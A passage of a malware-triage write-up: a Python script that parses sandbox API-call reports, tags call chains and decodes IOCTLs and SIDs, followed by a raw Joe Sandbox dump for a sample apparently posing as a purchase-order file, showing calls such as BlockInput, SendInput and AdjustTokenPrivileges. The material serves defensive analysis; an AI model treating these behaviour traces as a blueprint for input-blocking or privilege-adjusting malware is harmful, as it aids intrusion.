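    r"(?P<api>[\w@]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

def parse_records(text):
    """Split the report into records (one per 'APIs' header), each a list of Call."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":
            records.append([])
        elif records and (m := CALL_RE.match(line)):
            args = m.group("args").split(",") if m.group("args") else []
            records[-1].append(Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return records

def apis(record):
    return [c.api for c in record]

# Behaviour signatures (labels and notes are this example's own): a record matches
# when it contains every API in the set.
SIGNATURES = [
    ({"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"},
     "crt-unhandled-exception-path",
     "MSVC CRT abort path; IsDebuggerPresent here is runtime boilerplate, not anti-debugging by itself"),
    ({"SetErrorMode", "GetDiskFreeSpaceExW"}, "drive-space-query",
     "SetErrorMode(1) = SEM_FAILCRITICALERRORS silences the 'no disk' dialog around the query"),
    ({"CreateFileW", "DeviceIoControl", "CloseHandle"}, "device-ioctl",
     "opens a device object and sends a control code; decode it to see which"),
    ({"AllocateAndInitializeSid", "CheckTokenMembership", "FreeSid"}, "group-membership-check",
     "builds a well-known SID and tests the caller's token against it (IsUserAnAdmin pattern)"),
]

def classify(record):
    present = set(apis(record))
    return [label for needed, label, _ in SIGNATURES if needed <= present]

# CTL_CODE layout from the Windows DDK: DeviceType<<16 | Access<<14 | Function<<2 | Method.
KNOWN_IOCTLS = {0x002D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}  # FILE_DEVICE_MASS_STORAGE (0x2D), function 0x500

def decode_ioctl(code):
    return {"code": code, "device": (code >> 16) & 0xFFFF, "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF, "method": code & 0x3, "name": KNOWN_IOCTLS.get(code)}

def find_ioctls(record):
    """DeviceIoControl's second argument is dwIoControlCode."""
    return [decode_ioctl(int(c.args[1], 16)) for c in record
            if c.api == "DeviceIoControl" and len(c.args) > 1 and c.args[1] != "?"]

WELL_KNOWN_SIDS = {"S-1-5-32-544": "BUILTIN\\Administrators"}

def sid_from_args(args, authority=5):
    """AllocateAndInitializeSid(pAuthority, nSubAuthorityCount, sub0..sub7, ...). The authority is
    passed by pointer and shows as '?' in the report; NT authority (5) is assumed here, since the
    32/544 pair (SECURITY_BUILTIN_DOMAIN_RID / DOMAIN_ALIAS_RID_ADMINS) is defined under S-1-5."""
    count = int(args[1], 16)
    return "S-1-%d-%s" % (authority, "-".join(str(int(a, 16)) for a in args[2:2 + count]))

if __name__ == "__main__":
    for n, rec in enumerate(parse_records(SAMPLE_REPORT)):
        print("record %d: %s -> %s" % (n, " / ".join(apis(rec)), classify(rec)))
        for io in find_ioctls(rec):
            print("  IOCTL 0x%08X: device=0x%X function=0x%X method=%d (%s)"
                  % (io["code"], io["device"], io["function"], io["method"], io["name"]))
        for c in rec:
            if c.api == "AllocateAndInitializeSid":
                sid = sid_from_args(c.args)
                print("  SID %s (%s)" % (sid, WELL_KNOWN_SIDS.get(sid, "unknown")))
```

Run as a script it prints each record's chain with its label, the decoded IOCTL for the DeviceIoControl record and the rebuilt SID for the token-membership record. The CRT note is the caveat worth keeping in mind during triage: the same three calls sit in the abort handler of any MSVC-built binary, so that chain alone is weak evidence of deliberate anti-debugging, and the decoded sub-authorities (32, 544) show that the membership test is against the local Administrators group rather than an arbitrary SID.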
                                APIs
                                • GetCurrentProcess.KERNEL32(001828E9,?,00174CBE,001828E9,002188B8,0000000C,00174E15,001828E9,00000002,00000000,?,001828E9), ref: 00174D09
                                • TerminateProcess.KERNEL32(00000000,?,00174CBE,001828E9,002188B8,0000000C,00174E15,001828E9,00000002,00000000,?,001828E9), ref: 00174D10
                                • ExitProcess.KERNEL32 ref: 00174D22
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: dfa6e6311f33323395abbf339abff63f72ffdd7b3eda6dc1f8acb25304a6499f
                                • Instruction ID: 1c807072b102770047d93a06dc622fd4619fab239725dec4ea4504903891d686
                                • Opcode Fuzzy Hash: dfa6e6311f33323395abbf339abff63f72ffdd7b3eda6dc1f8acb25304a6499f
                                • Instruction Fuzzy Hash: 93E0B631000188AFCF21AFD4DD59A583B79FB61781B158014FC599A522DB35EE92CB80
                                Strings
                                Similarity
                                • API ID:
                                • String ID: /
                                • API String ID: 0-2043925204
                                • Opcode ID: 3d99eddf20e398cf68f501b5538509b71ebcd2f59f290244bf14213dd38aecba
                                • Instruction ID: d3d1ee18ba1b9f84214412e078655f2e0ed3d9bcde84cfab2ddd7157bc629cd6
                                • Opcode Fuzzy Hash: 3d99eddf20e398cf68f501b5538509b71ebcd2f59f290244bf14213dd38aecba
                                • Instruction Fuzzy Hash: 61410876500219ABCB24AFB9DC49EBB7779FB84354F504269F905D7180E7709E818FA0
                                APIs
                                • GetUserNameW.ADVAPI32(?,?), ref: 001AD28C
                                Strings
                                Similarity
                                • API ID: NameUser
                                • String ID: X64
                                • API String ID: 2645101109-893830106
                                • Opcode ID: 8d96aa1334d777ada449dcaff991e04b4b3da82e6d1f975c5c6701caa68e7455
                                • Instruction ID: da603a9316b1ca49e03ba00c6a7ae9b626bed7a79e83e9d299d45527a55fb86a
                                • Opcode Fuzzy Hash: 8d96aa1334d777ada449dcaff991e04b4b3da82e6d1f975c5c6701caa68e7455
                                • Instruction Fuzzy Hash: E2D0C9B880111DEACB94DB90ECC8DDEB37CBB04305F110152F506A2000DB3095498F50
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                • Instruction ID: 353e45805d69377230ec44f27d0e511099c3c35a3d332279eba0220d56fcbe14
                                • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                • Instruction Fuzzy Hash: 06021B71E002199BDF24CFA9C8906ADFBF1EF58314F25816ED919E7384D731AA418BD4
                                Strings
                                Similarity
                                • API ID:
                                • String ID: Variable is not of type 'Object'.$p#"
                                • API String ID: 0-2226386633
                                • Opcode ID: 6bdeead8a43f5e9f7f093831d8a81d40ce73a18b5db3ac0ed8511956f3e6a3c2
                                • Instruction ID: e6788ab9e68f919d5ae92f26a5c0e20fefbddc94f7d5f6762ae3879121acd0a4
                                • Opcode Fuzzy Hash: 6bdeead8a43f5e9f7f093831d8a81d40ce73a18b5db3ac0ed8511956f3e6a3c2
                                • Instruction Fuzzy Hash: 6B327974900318DFCF19DF94C881AEDB7B5BF1A305F144059E826AF292D775AE49CBA0
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 001C6918
                                • FindClose.KERNEL32(00000000), ref: 001C6961
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID:
                                • API String ID: 2295610775-0
                                • Opcode ID: aedafde08dcd7b9990856c0ba85b717a0798850d58ce5772da3595ed1b633e8b
                                • Instruction ID: cb8cebed15263defe83a7d9a38091470666a780f663452734b99ad9b7b08e580
                                • Opcode Fuzzy Hash: aedafde08dcd7b9990856c0ba85b717a0798850d58ce5772da3595ed1b633e8b
                                • Instruction Fuzzy Hash: 8311BE316042019FC710CF69D885E1ABBE1EF98329F04C69DE8698F6A2C730EC45CBD0
                                APIs
                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001D4891,?,?,00000035,?), ref: 001C37E4
                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001D4891,?,?,00000035,?), ref: 001C37F4
                                Similarity
                                • API ID: ErrorFormatLastMessage
                                • String ID:
                                • API String ID: 3479602957-0
                                • Opcode ID: 929267a09dca4236884481de27772d90db3929d3b47556769a39ceaa1b5beae0
                                • Instruction ID: 0d806c60f141454299a9fe1ae095506f788598809ec2eb0a897d291245ee0e3b
                                • Opcode Fuzzy Hash: 929267a09dca4236884481de27772d90db3929d3b47556769a39ceaa1b5beae0
                                • Instruction Fuzzy Hash: EFF0E5B16043296AEB2017A68C8DFEB7AAEEFC5761F000165F519D2281DA609944C6F0
                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 001BB25D
                                • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 001BB270
                                Similarity
                                • API ID: InputSendkeybd_event
                                • String ID:
                                • API String ID: 3536248340-0
                                • Opcode ID: 16937ffffb7f8227e6ae5d8b96f983665ccdfd3369cf2b1fe3b19ca9929b5d94
                                • Instruction ID: 181517e38a4b2ff027b0b3c224695ee2eec24733d1d80b23ac04a90051dec9d6
                                • Opcode Fuzzy Hash: 16937ffffb7f8227e6ae5d8b96f983665ccdfd3369cf2b1fe3b19ca9929b5d94
                                • Instruction Fuzzy Hash: 6CF01D7190428EABDB059FA1C845BEE7BB4FF04305F008049F965A9191C379D6519F94
                                APIs
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001B11FC), ref: 001B10D4
                                • CloseHandle.KERNEL32(?,?,001B11FC), ref: 001B10E9
                                Similarity
                                • API ID: AdjustCloseHandlePrivilegesToken
                                • String ID:
                                • API String ID: 81990902-0
                                • Opcode ID: 0f05c0d7edc46ddefa2b4b115e2539b28a7e91323d9c116bcc2fbed42d038ef3
                                • Instruction ID: 226fd330bbba92d0709267fe84b32f6bfd97537d7d80a80ee7159cb8d4d119a5
                                • Opcode Fuzzy Hash: 0f05c0d7edc46ddefa2b4b115e2539b28a7e91323d9c116bcc2fbed42d038ef3
                                • Instruction Fuzzy Hash: 67E04F32004600AEE7252B51FC05EB77BA9FB04310B10882EF4A5844B1DB626CE1DB50
                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00186766,?,?,00000008,?,?,0018FEFE,00000000), ref: 00186998
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID:
                                • API String ID: 3997070919-0
                                • Opcode ID: 7efdca6b6de1e8e9f838ceb9e88d152baab41f40cf381180628403ae2db99702
                                • Instruction ID: 9bfe75c222f64e5ec982550b100e19866e543599ca4d78efbf4873f1714a709b
                                • Opcode Fuzzy Hash: 7efdca6b6de1e8e9f838ceb9e88d152baab41f40cf381180628403ae2db99702
                                • Instruction Fuzzy Hash: 7EB13B31610609DFD719DF28C48AB657BE0FF45368F258658E89ACF2A2C735EA91CF40
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 82aa001afdb5d6f65a5e020ab521dfae21cd02f4d58943eac68545285ed04267
                                • Instruction ID: 313af184affb30cb9f5ea653d44c337edcd3bb2866dcfb1bbdad865218d7e918
                                • Opcode Fuzzy Hash: 82aa001afdb5d6f65a5e020ab521dfae21cd02f4d58943eac68545285ed04267
                                • Instruction Fuzzy Hash: E0124075D042299BDB24CF58C8807EEB7F5FF48710F1581AAE849EB255EB309E91CB90
                                APIs
                                • BlockInput.USER32(00000001), ref: 001CEABD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: BlockInput
                                • String ID:
                                • API String ID: 3456056419-0
                                • Opcode ID: bcf00c57f613047c4544b588b4e39f11e078695fea6f1e51366c5ae0b102192a
                                • Instruction ID: 024d7c106a67a6646738c74a8a72d81279c34f3de4f4968b0fd84092d86be4b0
                                • Opcode Fuzzy Hash: bcf00c57f613047c4544b588b4e39f11e078695fea6f1e51366c5ae0b102192a
                                • Instruction Fuzzy Hash: 69E04F312102049FC710EF69D844E9AF7E9AFA8760F00841AFC49CB751DBB0E8458B90
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001703EE), ref: 001709DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 802fb7797659b3b728709d5b70caf001c6ae58f0c7cc04cbf027d018100d0a5c
                                • Instruction ID: 154f79b0d7f5f09755330166283a257bd882121cb5ff6d08619dcd53b9fca18e
                                • Opcode Fuzzy Hash: 802fb7797659b3b728709d5b70caf001c6ae58f0c7cc04cbf027d018100d0a5c
                                • Instruction Fuzzy Hash:
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                • Instruction ID: 51a7e498feb8b096793290e993707060369b2d86b0323a33945bddb6f5a2ed3a
                                • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                • Instruction Fuzzy Hash: CF51887164C705ABDF388568C85EBBE63B99B12358F18C919E98EC72C2C711DE41D393
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: 0&"
                                • API String ID: 0-3449093698
                                • Opcode ID: 2627cc5f48510c8a37ac77796b6f6e8dfead87f0c9f1fb73ecefabd65589e713
                                • Instruction ID: cd654b31cc05e0e0be617e21116041658166cab8eb6d2b65d112cb4e55a30b73
                                • Opcode Fuzzy Hash: 2627cc5f48510c8a37ac77796b6f6e8dfead87f0c9f1fb73ecefabd65589e713
                                • Instruction Fuzzy Hash: 4821B7326206119BD728CF79D92367E73E9A764310F15862EE4A7C77D1DE3AE904CB80
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77d7abe44138616d7bd2ef4e51195efccc77e87f9baa4961c8739b9fa3a81edc
                                • Instruction ID: 34283e9119d23779ff2c4252e097093873a9d9afd2a2f44c0ba8dc2d5cb560f4
                                • Opcode Fuzzy Hash: 77d7abe44138616d7bd2ef4e51195efccc77e87f9baa4961c8739b9fa3a81edc
                                • Instruction Fuzzy Hash: 4532F321D29F014DD723A634D822335A649AFB73C5F25D737E81AB5DAAEB39C5C38600
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6f49192fc4c1b10feb3632740c1fd46f237f3380d41a39de5cbd48247e7256cd
                                • Instruction ID: b2c1d17542a7bec7d5957da00b4372dac64ca418dcf669dc1f19bd9aa3f1f886
                                • Opcode Fuzzy Hash: 6f49192fc4c1b10feb3632740c1fd46f237f3380d41a39de5cbd48247e7256cd
                                • Instruction Fuzzy Hash: 5E32373AA041158BCF28CF6CC8946BD7BA1EF46314F29856AD49ADB391E730DD81DBD0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c85812601e5ff052a5dbf8b220c39fd7cc63c2873879d0421ccb7fc99409b66a
                                • Instruction ID: 9ee16eb595346af47c890bd2842d56c3da12b36eb881c4dd2ae70674a3140bae
                                • Opcode Fuzzy Hash: c85812601e5ff052a5dbf8b220c39fd7cc63c2873879d0421ccb7fc99409b66a
                                • Instruction Fuzzy Hash: CF22C2B0A04609DFDF14CF64D882AAEB7F6FF54301F144529E826EB291EB36AD15CB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5dc1ab9305b4bb67064b6f080fcf67c09e987f177991ab48d0212383e757bd4b
                                • Instruction ID: ce52f3b31a2a47d720de1609251c19317ece2e914cea1ee3e4952525fa969d8d
                                • Opcode Fuzzy Hash: 5dc1ab9305b4bb67064b6f080fcf67c09e987f177991ab48d0212383e757bd4b
                                • Instruction Fuzzy Hash: C402B6B1E00209EBDF04DF64D881AADBBF5FF54300F118169E816DB291EB31EA65CB95
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                • Instruction ID: b353f8d3a72e557f59149b42d8492c632099f8f23664a6b0ca0e3bffe41ce1c6
                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                • Instruction Fuzzy Hash: C59188731080A35ADB2E467E857907EFFF15A923A131A479DD4FACA1C1FF20C954DA20
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                • Instruction ID: 815156f3c3dd5adc3df66e13d35b1b868088af752db7552e44a448c99f7c8796
                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                • Instruction Fuzzy Hash: B99130722090E25ADB2D467E857403DFEF15A923A131A879DD4FACB1C1FF248659D620
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0462ae075220569421503736d0015834fdb0a28793959f49ad4d55881531e2fe
                                • Instruction ID: 7104e99ce7bf15d4157ad1316843741d0bbf4cc2354614b711f26d50d2626b90
                                • Opcode Fuzzy Hash: 0462ae075220569421503736d0015834fdb0a28793959f49ad4d55881531e2fe
                                • Instruction Fuzzy Hash: 48616831748709A6EE38AA288C95BBE23B4DF55700F18C91AE94EDB2C1DB119F42C755
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                • Instruction ID: f633d32736c9c6c9d2fbf2fc55baca527b92d4ba7fe3de46f20a2499283c0b80
                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                • Instruction Fuzzy Hash: 7D8184336080A319DB6D463E853407EFFF15A923A531A879DD4FACB1C1EF24C659E620
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                • Instruction ID: ffe3cd98e9db5fe8b654b55c60ace177327ab8d7675936fe6e63b52f5742e164
                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                • Instruction Fuzzy Hash: E441A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                • Instruction ID: 395138cc11a6358c9de9540bd5669d4ed6b2c8d8c213cb472573665698c54d23
                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
